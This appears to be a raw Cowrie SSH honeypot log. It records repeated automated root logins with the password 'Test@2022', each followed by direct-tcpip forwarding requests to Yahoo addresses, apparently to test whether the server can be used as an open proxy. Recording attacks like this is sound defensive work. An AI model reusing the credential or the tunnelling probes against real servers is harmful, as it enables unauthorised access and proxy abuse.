{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.941613Z","src_ip":"213.209.150.239","session":"3532a6833fbb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3207,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eca1e39dd36","protocol":"ssh","message":"New connection: 213.209.150.239:3207 (1.2.3.4:22) [session: 5eca1e39dd36]","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.996984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.997646Z","src_ip":"213.209.150.239","session":"5eca1e39dd36"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.054202Z","src_ip":"213.209.150.239","session":"5eca1e39dd36"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.335923Z","src_ip":"213.209.150.239","session":"5eca1e39dd36"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32585,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32585","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.393499Z","session":"5eca1e39dd36"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.450159Z","src_ip":"213.209.150.239","session":"5eca1e39dd36"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24845,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24845","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.606917Z","session":"5eca1e39dd36"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.663427Z","src_ip":"213.209.150.239","session":"5eca1e39dd36"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.720524Z","src_ip":"213.209.150.239","session":"5eca1e39dd36"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3259,"dst_ip":"1.2.3.4","dst_port":22,"session":"15cb79e11746","protocol":"ssh","message":"New connection: 213.209.150.239:3259 (1.2.3.4:22) [session: 15cb79e11746]","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.766972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.767703Z","src_ip":"213.209.150.239","session":"15cb79e11746"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:10.815081Z","src_ip":"213.209.150.239","session":"15cb79e11746"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.050752Z","src_ip":"213.209.150.239","session":"15cb79e11746"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21978,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21978","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.099654Z","session":"15cb79e11746"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.146956Z","src_ip":"213.209.150.239","session":"15cb79e11746"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12654,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12654","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.281604Z","session":"15cb79e11746"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.328741Z","src_ip":"213.209.150.239","session":"15cb79e11746"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.377061Z","src_ip":"213.209.150.239","session":"15cb79e11746"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3301,"dst_ip":"1.2.3.4","dst_port":22,"session":"81077a4d4c5e","protocol":"ssh","message":"New connection: 213.209.150.239:3301 (1.2.3.4:22) [session: 81077a4d4c5e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.423370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.423963Z","src_ip":"213.209.150.239","session":"81077a4d4c5e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.471432Z","src_ip":"213.209.150.239","session":"81077a4d4c5e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.706626Z","src_ip":"213.209.150.239","session":"81077a4d4c5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26059,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26059","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.754723Z","session":"81077a4d4c5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.802030Z","src_ip":"213.209.150.239","session":"81077a4d4c5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5821,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5821","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.937556Z","session":"81077a4d4c5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:11.984993Z","src_ip":"213.209.150.239","session":"81077a4d4c5e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.033571Z","src_ip":"213.209.150.239","session":"81077a4d4c5e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3344,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6b235e73ca8","protocol":"ssh","message":"New connection: 213.209.150.239:3344 (1.2.3.4:22) [session: e6b235e73ca8]","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.088697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.089883Z","src_ip":"213.209.150.239","session":"e6b235e73ca8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.146445Z","src_ip":"213.209.150.239","session":"e6b235e73ca8"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":59548,"dst_ip":"1.2.3.4","dst_port":22,"session":"96c533dd05bd","protocol":"ssh","message":"New connection: 36.89.28.139:59548 (1.2.3.4:22) [session: 96c533dd05bd]","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.147923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.148450Z","src_ip":"36.89.28.139","session":"96c533dd05bd"}
{"eventid":"cowrie.session.closed","duration":30.64693284034729,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.283106Z","src_ip":"212.227.235.229","session":"c0c28b392dca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.429215Z","src_ip":"213.209.150.239","session":"e6b235e73ca8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":22257,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22257","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.488213Z","session":"e6b235e73ca8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.544974Z","src_ip":"213.209.150.239","session":"e6b235e73ca8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17036,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17036","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.699064Z","session":"e6b235e73ca8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.755732Z","src_ip":"213.209.150.239","session":"e6b235e73ca8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.813189Z","src_ip":"213.209.150.239","session":"e6b235e73ca8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3394,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a724f80fda1","protocol":"ssh","message":"New connection: 213.209.150.239:3394 (1.2.3.4:22) [session: 3a724f80fda1]","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.859365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.860284Z","src_ip":"213.209.150.239","session":"3a724f80fda1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.907271Z","src_ip":"213.209.150.239","session":"3a724f80fda1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:59:12.961046Z","src_ip":"36.89.28.139","session":"96c533dd05bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.142305Z","src_ip":"213.209.150.239","session":"3a724f80fda1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":2971,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:2971","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.190427Z","session":"3a724f80fda1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.237561Z","src_ip":"213.209.150.239","session":"3a724f80fda1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28367,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28367","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.373511Z","session":"3a724f80fda1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.420654Z","src_ip":"213.209.150.239","session":"3a724f80fda1"}
